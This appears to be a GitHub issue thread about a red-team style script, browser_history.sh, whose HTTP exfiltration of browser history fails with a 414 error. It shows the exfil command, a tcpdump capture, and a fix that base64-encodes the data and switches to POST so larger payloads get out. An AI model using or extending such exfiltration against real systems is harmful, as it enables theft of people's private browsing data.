Exfil Function - Unable to exfil data when size exceeds HTTP RFC: 414 Request-URI Too Long

[darmado]

Unable to exfil data when size of data exceeds HTTP RFC standards.

Command ╰─➤ sh browser_history.sh -c --exfil=http://localhost

Evidence - Server side response

tcpdump -ni lo0 port 80 -A -s 0 -l

`....s...HTTP/1.1 414 Request-URI Too Long Date: Wed, 18 Sep 2024 05:07:05 GMT Server: Apache/2.4.56 (Unix) Content-Length: 248 Connection: close Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

Request-URI Too Long

The requested URL's length exceeds the capacity limit for this server.

`

[darmado]

FIXED

• Added a base64_encode() function to handle the base64 encoding.
• Modified exfiltrate_http() to always base64 encode the data before sending.
• Updated the main function to apply the specified encoding (if any) before passing the data to the exfiltration functions.
• Removed the GET method from exfiltrate_http and always use POST, as the data will always be base64 encoded now.

Also default b64 encoding to exfil functions

• Modified encode_output() to include a base64 option that trims newlines.
• Updated exfiltrate_http() to use encode_output() for base64 encoding, setting ENCODE=base64 temporarily.
• Kept the main() function logic mostly the same to make sure the script honors --encode arg encode_output() function.